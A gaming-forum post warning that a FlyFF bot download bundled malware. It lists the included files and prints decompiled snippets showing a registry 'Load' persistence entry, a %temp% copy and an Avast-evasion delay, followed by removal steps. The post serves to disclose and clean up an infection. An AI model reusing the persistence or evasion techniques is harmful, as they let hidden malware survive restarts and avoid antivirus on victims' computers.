This thread is probably in the wrong section, however I decided to post it here because the users who downloaded it most likely doesn't check the other sections. Also, the original thread is closed.
It contained the following files:
- farmbot
- TargetMinimap.exe (bad boy)
- config.ini (legit)
- General Bot.exe (legit)
- hook.dll (confuse file)
- interface.asi (confuse file)
- NeuzInfiltration.dll (confuse file)
- upgrading.dll (confuse file)
Most of the files being files that adds extra layers of "confusion" on what is happening to prevent suspicion.
hook.dll is most likely not used due to how the bot worked. It worked by pixel scanning and had nothing to do with memory.
interface.asi is most likely not associated with the bot either. I cannot really speak on this however after a little bit of analysis it seems to be a dll regarding sound.
NeuzInfiltration.dll do I have to say anything on this one? No.
upgrading.dll is a dll that has been renamed to confuse the user. It was previously Miles Sound System. Company Name : RAD Game Tools. Inc.
General Bot.exe is the legit thing which contains the au3 script as a resource. Not more to say.
farmbot -> TargetMinimap.exe is however the interesting part of this. It is a software coded in a .NET language which is protected by smartassembly. Some naughty stuff can be found inside of this one.
I have not analysed it throughly, however a couple of things caught my attention.
First thing:
Code:
standardInput.Write(string.Concat(new string[] { Class5.smethod_1("ZoZsR/ZaAWzxqaKwo+nWGkxoLc6Ds9GNObStufkfOT2TLcBbjyvMGWz5Ui7BQiviEu7Vk8MO6FJ1iaMc1ALpfry+mE2yigOyL28GnNKe0ab37UCQ2TsndQdis/7A49IH"), "%temp%\\", Class5.smethod_1("35HUeD+OlAq9ZwumSXi79g=="), "\\", Class5.smethod_1("2atqj4HZ4WJ029aPZ3Ly2d46DqSi1+THRQs1q+XH92I="), ".lnk \" /f", Environment.NewLine }));
reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "
FlyFF Bot
generalbotstart.exe
The registry key that the bot adds prevent the startup programs from running when restarting the computer. It can be resolved by deleting the key in registry.
Another thing that caught my attention was the following code:
Code:
if (!Class5.smethod_0(Class5.smethod_1("kH6hMrdds0P1ED86mOaZMg=="))) { goto IL_D1; } IL_C3: num2 = 11; Thread.Sleep(26001); IL_D1:
It basically is a bit of code to prevent Avast from detecting it as a virus. It is a known method and can be read on the internet.
It has made of copy of TargetMinimap.exe in the following directory: %temp%\FlyFF Bot
Make sure to delete those files and fix the registry as mentioned above. As I said before, I did not analyse it throughly, I'm sure it contained more bullshit, so watch out boys.
TL;DR
Delete the key named Load in registry located at HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
Goto %temp%\FlyFF Bot in the file explorer and delete the shortcut and the duplicated virus.
Do not restart your computer before you've done these fixes. Otherwise a empty messagebox will popup and once you hit ok, the virus will kick in and do a bunch of naught stuff.